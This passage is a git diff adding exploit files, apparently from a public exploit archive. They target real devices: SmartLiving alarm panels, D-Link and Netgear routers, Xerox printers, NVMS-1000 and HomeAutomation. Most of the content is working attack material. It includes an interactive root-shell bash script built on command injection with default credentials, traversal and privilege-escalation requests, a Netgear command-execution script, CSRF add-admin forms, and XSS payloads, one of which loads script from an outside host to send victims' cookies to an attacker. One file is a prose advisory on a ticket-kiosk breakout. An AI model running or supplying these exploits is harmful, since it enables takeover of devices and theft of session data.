+# important features rarely found in residential, commercial or industrial application
+# systems of its kind. This optimized-performance control panel provides first-rate
+# features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
+# end-to-end voice transmission (voice-on-bus), IP connectivity.
+#
+# SMARTLAN/SI:
+# The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
+# networking capability and fast connectivity to the Internet. Therefore, it is possible
+# to set up a remote connection and program or control the system via the SmartLeague
+# software application. In effect, the SmartLAN/SI board grants the same level of access
+# to the system as a local RS232 connection.
+#
+# SMARTLAN/G:
+# The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
+# advanced remote-access and communication functions. The SmartLAN/G board is capable of
+# sending event-related e-mails automatically. Each e-mail can be associated with a subject,
+# an attachment and a text message. The attachment can be of any kind and is saved to an
+# SD card. The message text can contain direct links to domains or IP addressable devices,
+# such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
+# global access to their control panels via any Internet browser accessed through a PC,
+# PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
+# distinguishing the means of connection and as a result provides an appropriate web-page
+# for the tool in use. Smartphones can control the system in much the same way as a
+# household keypad, from inside the house or from any part of the world.
+#
+# Desc: SmartLiving SmartLAN suffers from an authenticated remote command injection vulnerability.
+# The issue exist due to the 'par' POST parameter not being sanitized when called with
+# the 'testemail' module through web.cgi binary. The vulnerable CGI binary (ELF 32-bit
+# LSB executable, ARM) is calling the 'sh' executable via the system() function to issue
+# a command using the mailx service and its vulnerable string format parameter allowing
+# for OS command injection with root privileges. An attacker can remotely execute system
+# commands as the root user using default credentials and bypass access controls in place.
+#
+# ================= dissassembly of vuln function =================
+#
+#[0x0000c86c]> pd @ 0x000c86c
+#| ;-- pc:
+#| ;-- r15:
+#| 0x0000c86c    ldr r1, str.testemail       ; [0xed96:4]=0x74736574 ; "testemail" ; const char * s2
+#| 0x0000c870    bl sym.imp.strcmp           ; int strcmp(const char *s1, const char *s2)
+#| 0x0000c874    cmp r0, 0
+#| 0x0000c878    bne 0xc8b8
+#| 0x0000c87c    cmp sl, 0
+#| 0x0000c880    beq 0xd148
+#| 0x0000c884    bl sym.set_no_cache
+#| 0x0000c888    add r5, sp, 0x20
+#| 0x0000c88c    mov r0, r4
+#| 0x0000c890    ldr r1, str.application_json ; [0xeda0:4]=0x6c707061 ; "application/json"
+#| 0x0000c894    bl sym.imp.qcgires_setcontenttype
+#| 0x0000c898    mov r0, r5                  ; char *s
+#| 0x0000c89c    mov r1, 0xc8                ; 200 ; size_t
+#| 0x0000c8a0    ldr r2, str.echo__Hello_____mailx__s__Email_test___s ; [0xedb1:4]=0x6f686365 ; "echo \"Hello!\" | mailx -s \"Email test\" %s" ; con
+#| 0x0000c8a4    mov r3, r8                  ; ...
+#| 0x0000c8a8    bl sym.imp.snprintf         ; int snprintf(char *s,
+#| 0x0000c8ac    mov r0, r5                  ; const char * string
+#| 0x0000c8b0    bl sym.imp.system           ; int system(const char *string)
+#| 0x0000c8b4    b 0xd134
+#|
+#| system() @0x0000c8b0 arguments: "sh -c echo "Hello!" | mailx -s "Email test" %s"
+#| Trigger suggest: $(curl -sik http://192.168.1.17/cgi-bin/web.cgi -X POST --data "mod=testemail&par=;/sbin/ifconfig" --cookie "user=admin;pass=pass;code=9999")
+#| Process: 1351 root       0:00 sh -c echo "Hello!" | mailx -s "Emaiil test" ;/sbin/ifconfig
+#|__
+# =================================================================
+#
+# -----------------------------------------------------------------
+#
+# root@kali:~# ./xpl.sh https://192.168.1.17
+# 
+# Checking target: https://192.168.1.17
+# ACCESS GRANTED!
+# 
+# root@ssl> id; uname -a; getconf LONG_BIT; cat ../version.html; pwd
+# uid=0(root) gid=0(root) groups=0(root),10(wheel)
+# Linux SmartLAN 3.2.1 #195 PREEMPT Thu May 30 15:26:27 CEST 2013 armv5tejl GNU/Linux
+# 32
+# <!-- SLF6.07 10100 -->
+# <html><body><h2>
+# SmartLiving 6.07 10100
+# <br><br>SmartLAN/G v. 6.11
+# /www/cgi-bin
+# root@ssl> exit
+# root@kali:~/# 
+#
+# -----------------------------------------------------------------
+#
+# Tested on: GNU/Linux 3.2.1 armv5tejl
+#            Boa/0.94.14rc21
+#            BusyBox v1.20.2
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5544
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5544.php
+#
+#
+# 06.09.2019
+#
+
+URL=$1
+CGI="/cgi-bin/web.cgi"
+COOK="user=admin;pass=pass;code=9999"
+COOK1="user=admin;pass=pass;code=9998"
+COOK2="user=user;pass=pass;code=0001"
+PARAMS="mod=testemail&par=;"
+CHECK=${URL:4:1}
+
+if [ "$#" -ne 1 ]; then
+	echo -en "\e[34m"
+	echo "==============================================="
+	echo " SmartLiving  SmartLAN 6.x Remote Root Exploit"
+	echo -e "\t\tZSL-2019-5544"
+	echo "==============================================="
+	echo -en "\e[00m"
+	echo -e "\nUsage: $0 http(s)://ip:port\n"
+    exit 0
+fi
+
+echo -ne "\nChecking target: $URL\n"
+
+if [ "$CHECK" == "s" ]; then
+	TEST=$(curl -sIk $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')
+	if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then
+		echo "HTTPS with error!"
+		exit 0
+	fi
+	if curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null
+	then
+		echo -e "ACCESS GRANTED!\n"
+	else
+		echo "Invalid credentials."
+		exit 0
+	fi
+	while true; do
+		R="$(tput sgr0)"
+		S="$(tput setaf 2)"
+		read -rp "${S}root@ssl>${R} " CMD
+		if [[ "$CMD" == "exit" ]]; then
+			exit 0
+		fi
+		curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5 
+	done
+else
+	TEST=$(curl -sI $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')
+	if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then
+		echo "HTTP with error!"
+		exit 0
+	fi
+	if curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null
+	then
+		echo -e "ACCESS GRANTED!\n"
+	else
+		echo "Invalid credentials."
+		exit 0
+	fi
+	while true; do
+		R="$(tput sgr0)"
+		S="$(tput setaf 2)"
+		read -rp "${S}root@http>${R} " CMD
+		if [[ "$CMD" == "exit" ]]; then
+			exit 0
+		fi
+		curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5
+	done
+fi
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47774.txt b/exploits/hardware/webapps/47774.txt
new file mode 100644
index 000000000..8f82fa554
--- /dev/null
+++ b/exploits/hardware/webapps/47774.txt
@@ -0,0 +1,27 @@
+# Title: NVMS-1000 - Directory Traversal
+# Date: 2019-12-12
+# Author: Numan Türle
+# Vendor Homepage: http://en.tvt.net.cn/
+# Version : N/A
+# Software Link : http://en.tvt.net.cn/products/188.html
+
+POC
+---------
+
+GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
+Host: 12.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+Response
+---------
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47776.txt b/exploits/hardware/webapps/47776.txt
new file mode 100644
index 000000000..8a3e360d2
--- /dev/null
+++ b/exploits/hardware/webapps/47776.txt
@@ -0,0 +1,37 @@
+# Exploit Title: D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting
+# Date: 2019-12-13
+# Exploit Author: Sanyam Chawla
+# Vendor Homepage: http://www.dlink.co.in
+# Category: Hardware (Wi-fi Router)
+# Hardware Link: http://www.dlink.co.in/products/?pid=678
+# Hardware Version: T1
+# Firmware Version: 20.07
+# Tested on: Windows 10 and Kali linux
+# CVE: CVE-2019-19742
+
+Reproduction Steps:
+1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
+2. Go to Maintenance page and click on Admin on the left panel
+3. Put blind xss Payload in to the name field “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page.
+4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
+5. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage.
+
+#Burp Intercept
+
+POST /form2userconfig.cgi HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
+Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 180
+Origin: http://192.168.0.1
+Connection: close
+Referer: http://192.168.0.1/userconfig.htm
+Cookie: SessionID=
+Upgrade-Insecure-Requests: 1
+
+username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht
+<http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47778.txt b/exploits/hardware/webapps/47778.txt
new file mode 100644
index 000000000..062ba05e4
--- /dev/null
+++ b/exploits/hardware/webapps/47778.txt
@@ -0,0 +1,37 @@
+# Exploit Title: D-Link DIR-615 - Privilege Escalation
+# Date: 2019-12-10
+# Exploit Author: Sanyam Chawla
+# Vendor Homepage: http://www.dlink.co.in
+# Category: Hardware (Wi-fi Router)
+# Hardware Link: http://www.dlink.co.in/products/?pid=678
+# Hardware Version: T1
+# Firmware Version: 20.07
+# Tested on: Windows 10 and Kali linux
+# CVE: CVE-2019-19743
+
+# Reproduction Steps:
+# Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
+# Go to the Maintenance page and click on Admin on the left panel.
+# There is an option to create a user and by default, it shows only user accounts.
+# Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) 
+# by changing privileges id (1 to 2) with burp suite.
+
+# Privilege Escalation Post Request 
+
+POST /form2userconfig.cgi HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 122
+Origin: http://192.168.0.1
+Connection: close
+Referer: http://192.168.0.1/userconfig.htm
+Cookie: SessionID=
+Upgrade-Insecure-Requests: 1
+
+username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
+
+# Now log in with newly created root (ptguy) user. You have all administrator rights.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47782.py b/exploits/hardware/webapps/47782.py
new file mode 100755
index 000000000..8500b1891
--- /dev/null
+++ b/exploits/hardware/webapps/47782.py
@@ -0,0 +1,27 @@
+# Exploit Title: Netgear R6400 - Remote Code Execution
+# Date: 2019-12-14
+# Exploit Author: Kevin Randall
+# CVE: CVE-2016-6277
+# Vendor Homepage: https://www.netgear.com/
+# Category: Hardware
+# Version: V1.0.7.2_1.1.93
+
+# PoC
+
+#!/usr/bin/python
+
+import urllib2
+
+IP_ADDR = "192.168.1.1"
+PROTOCOL = "http://"
+DIRECTORY = "/cgi-bin/;"
+CMD = "date"
+FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD
+
+req = urllib2.Request(url = FULL_URL)
+response = urllib2.urlopen(req)
+commandoutput = response.read()
+spl_word =  "}"
+formattedoutput = commandoutput
+result = formattedoutput.rpartition(spl_word)[2]
+print result
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47787.txt b/exploits/hardware/webapps/47787.txt
new file mode 100644
index 000000000..af07b32eb
--- /dev/null
+++ b/exploits/hardware/webapps/47787.txt
@@ -0,0 +1,68 @@
+# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
+# Date: 2018-12-17 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.xerox.com/
+# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
+# Software : Xerox Printer
+# Product Version:  AltaLink C8035
+# Vulernability Type : Cross-Site Request Forgery (Add Admin)
+# Vulenrability : Cross-Site Request Forgery
+# CVE : N/A
+
+# Description :
+# The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.
+# A request to add users is made in the Device User Database form field. This request is captured by
+# the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request
+# to add users is made in the Device User Database form field to the xerox.set URI. 
+# (The frmUserName value must have a unique name.)
+
+# HTTP POST Request :
+
+POST /dummypost/xerox.set HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 707
+Origin: https://XXX.XXX.XXX.XXX
+Connection: close
+Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10
+Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
+Upgrade-Insecure-Requests: 1
+
+NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10
+
+# CSRF PoC HTML :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST">
+      <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;" />
+      <input type="hidden" name="isRoles" value="True" />
+      <input type="hidden" name="isPassword" value="True" />
+      <input type="hidden" name="isCreate" value="True" />
+      <input type="hidden" name="rolesStr" value="6&#44;1&#44;2" />
+      <input type="hidden" name="limited" value="0" />
+      <input type="hidden" name="oid" value="0" />
+      <input type="hidden" name="minLength" value="1" />
+      <input type="hidden" name="maxLength" value="63" />
+      <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
+      <input type="hidden" name="isUserNameDisallowed" value="TRUE" />
+      <input type="hidden" name="isNumberRequired" value="" />
+      <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
+      <input type="hidden" name="currentPage" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" />
+      <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;User&#95;Edit&#95;fn" />
+      <input type="hidden" name="frmFriendlyName" value="Ismail&#32;Tasdelen" />
+      <input type="hidden" name="frmUserName" value="ismailtasdelen" />
+      <input type="hidden" name="frmNewPassword" value="Test1234&#33;" />
+      <input type="hidden" name="frmRetypePassword" value="Test1234&#33;" />
+      <input type="hidden" name="frmOldPassword" value="undefined" />
+      <input type="hidden" name="SaveURL" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47796.txt b/exploits/hardware/webapps/47796.txt
new file mode 100644
index 000000000..ea8394556
--- /dev/null
+++ b/exploits/hardware/webapps/47796.txt
@@ -0,0 +1,266 @@
+# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
+# Date: 2019-12-18
+# Exploit Author: Vulnerability-Lab
+# Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
+# Tested on: Windows XP
+
+Document Title:
+===============
+Deutsche Bahn Ticket Vending Machine  - Local Kiosk Privilege Escalation Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2191
+
+Vulnerability Magazine:
+https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered
+
+
+Release Date:
+=============
+2019-12-14
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2191
+
+
+Common Vulnerability Scoring System:
+====================================
+6.4
+
+
+Vulnerability Class:
+====================
+Privilege Escalation
+
+
+Product & Service Introduction:
+===============================
+Customers can buy tickets at our ticket machines at any time, regardless
+of opening hours. Thus, the vending machine also
+secures sales in rural areas.
+
+- innovatively designed user guidance
+- Real-time timetable information for rail traffic
+- traveler information
+- ticket paper supply
+- free fault hotline: 0800 2886644
+- Professional and contemporary maintenance
+
+The ticket vending machine can also be configured according to
+individual requirements. The housing can be designed as desired.
+Customers can purchase their tickets with different means of payment.
+User guidance is available in different languages.
+
+(Copy of the Homepage:
+https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
+)
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a local kiosk
+privilege escalation vulnerability in the deutsche bahn ticket vending
+machine series with windows xp.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2019-12-14: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+No authentication (guest)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure Program
+
+
+Technical Details & Description:
+================================
+A kiosk mode escalation vulnerability has been discovered in the
+official deutsche bahn ticket vending machine series for windows.
+The security vulnerability allows local attackers to bypass the kiosk
+mode to compromise the local file system and applications.
+
+It is possible for local attackers to break out of the kiosk mode of the
+Deutsche Bahn vending machine application if
+the Password Agent (PasswordAgent.exe) of the system receives a timeout
+or has a runtime error in the program
+itself in the background. These errors can occur due to aborted
+sessions, unclean logout or common errors when
+using the application at system level.
+
+In the event of a local error, attackers can bring the error message to
+the foreground by pressing the number field - Cancel
+during a transaction. After the error message becomes visible, the
+attacker can click on a link of the error message where you
+can normally see what the error report contains. The attacker will then
+be redirected to a form in the error message, where he
+can search for errors in a collection of microsoft articles via "Submit
+/ Dont' Submit" or another link on the online path. There
+the attacker clicks on it and receives the web browser. From the web
+browser, the attacker retrieves the options menu and can access
+the local system directory and has then the ability to compromise the
+ticket vending machine with windows xp.
+
+The error message is normally on those devices deactivated through a
+hardening process of the servce provider. In that special case
+the exception handling of windows was not deactivated or set to the
+background, which allows the attacker to move through to other
+options to finally access the file system via browser.
+
+The ticket vending machine vulnerability requires no user interaction
+and can only be exploited by local attackers with physical
+device access. No keyboard or front loader opening required.
+
+
+Vulnerable System(s):
+[+] Windows XP
+
+Affected Component(s):
+[+] Exception Handling (Error Message Content)
+
+
+Proof of Concept (PoC):
+=======================
+The local vulnerability can be exploited by local attackers with
+physical device access without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+PoC: Sheet
+PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout
+=> Transaction Application => Cancel := Unexpected Error (Background) -
+Runtime/Session/Timeout (Front)
+=> Click Error Report => Click Search Collection => Web Browser => Local
+File System => PWND!
+
+
+What are attackers able to do when the file system of the vending
+machine is accessable thus way?
+1. Inject of local malware to the ticket machine (editor / debugger /
+cmd / ps - exp. ransomware/malware)
+2. Local manipulation for skimming devices to assist (transmit prepares)
+2. Phishing of local credentials from screen via system (db browser
+application)
+3. Intercept or manipulation to access card information (local file
+system - sniff/extract)
+4. Crash or freeze the computer system (exp. kill of process / loop script)
+5. Scare or joké activities (exp. html / js to front screens with web
+browser or by a new window process)
+
+Refernece(s):
+https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG
+https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG
+https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG
+
+
+Solution - Fix & Patch:
+=======================
+There are now several problems related to system hardening that can be
+resolved:
+1. It should not be possible for users with system user rights to use
+the web browsers
+2. The error message menu can be deactivated or completely modified
+3. Some functions in menus can be deactivated by hardening (browser,
+messages & Co.)
+4. Check that all other tasks are always running in the background or
+are being moved there permanently
+5. The deutsche bahn vending machine application and user interface
+should be shut down in the event of persistent errors in the foreground
+6. The activities of the testing has been logged but did not triggered
+any alert for defense purpose
+
+
+Deutsche Bahn: Patch Rollout in Progress
+https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png
+
+https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png
+
+
+Security Risk:
+==============
+The security risk of the local ticket vending machine system
+vulnerability is estimated as high.  The bug to escalate can be easily
+exploited by local interaction with the touch display to access the file
+system.
+
+
+Credits & Authors:
+==================
+Benjamin K.M. -
+https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2019 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47806.txt b/exploits/hardware/webapps/47806.txt
new file mode 100644
index 000000000..9266e586c
--- /dev/null
+++ b/exploits/hardware/webapps/47806.txt
@@ -0,0 +1,115 @@
+# Exploit: HomeAutomation 3.3.2 - Persistent Cross-Site Scripting
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: Tom Rosenback and Daniel Malmgren
+# Product web page: http://karpero.mine.nu/ha/
+# Affected version: 3.3.2
+# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+# Advisory ID: ZSL-2019-5556
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php
+# HomeAutomation v3.3.2 Stored and Reflected XSS
+
+
+Vendor: Tom Rosenback and Daniel Malmgren
+Product web page: http://karpero.mine.nu/ha/
+Affected version: 3.3.2
+
+Summary: HomeAutomation is an open-source web interface and scheduling solution.
+It was initially made for use with the Telldus TellStick, but is now based on a
+plugin system and except for Tellstick it also comes with support for Crestron,
+OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
+etc.) based on an advanced scheduling system, taking into account things like
+measurements from various sensors. With the houseplan view you can get a simple
+overview of the status of your devices at their location in your house.
+
+Desc: HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities
+when input passed via several parameters to several scripts is not properly sanitized
+before being returned to the user. This can be exploited to execute arbitrary HTML
+and script code in a user's browser session in context of an affected site.
+
+Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
+           Apache/2.4.29 (Ubuntu)
+           PHP/7.4.0RC4
+           PHP/7.3.11
+           PHP 7.2.24-0ubuntu0.18.04.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5556
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php
+
+
+06.11.2019
+
+--
+
+
+Reflected XSS:
+--------------
+
+https://192.168.2.113/?page=houseplan&autologin=1&msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ==
+
+
+Stored XSS:
+-----------
+
+POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Content-Length: 998
+Cache-Control: max-age=0
+Origin: http://localhost
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
+Sec-Fetch-User: ?1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&action=edit&id=-1
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og
+
+
+------WebKitFormBoundaryq4LcgA7mbqElCW4q
+Content-Disposition: form-data; name="id"
+
+-1
+------WebKitFormBoundaryq4LcgA7mbqElCW4q
+Content-Disposition: form-data; name="action"
+
+save
+------WebKitFormBoundaryq4LcgA7mbqElCW4q
+Content-Disposition: form-data; name="name"
+
+XSS
+------WebKitFormBoundaryq4LcgA7mbqElCW4q
+Content-Disposition: form-data; name="comment"
+
+"><script>confirm(document.cookie)</script>
+------WebKitFormBoundaryq4LcgA7mbqElCW4q
+Content-Disposition: form-data; name="icon_on"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryq4LcgA7mbqElCW4q
+Content-Disposition: form-data; name="scenario"
+
+1
+------WebKitFormBoundaryq4LcgA7mbqElCW4q
+Content-Disposition: form-data; name="devices[0]"
+
+1
+------WebKitFormBoundaryq4LcgA7mbqElCW4q
+Content-Disposition: form-data; name="statuses[0]"
+
+1
+------WebKitFormBoundaryq4LcgA7mbqElCW4q
+Content-Disposition: form-data; name="save"
+
+Save
+------WebKitFormBoundaryq4LcgA7mbqElCW4q--
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47813.txt b/exploits/hardware/webapps/47813.txt
new file mode 100644
index 000000000..08735b7ae
--- /dev/null
+++ b/exploits/hardware/webapps/47813.txt
@@ -0,0 +1,73 @@
+# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
+# Date: 2018-12-19 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.xerox.com/
+# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655
+# Software : Xerox Printer
+# Product Version:  WorkCentre® 6655
+# Vulernability Type : Cross-Site Request Forgery (Add Admin)
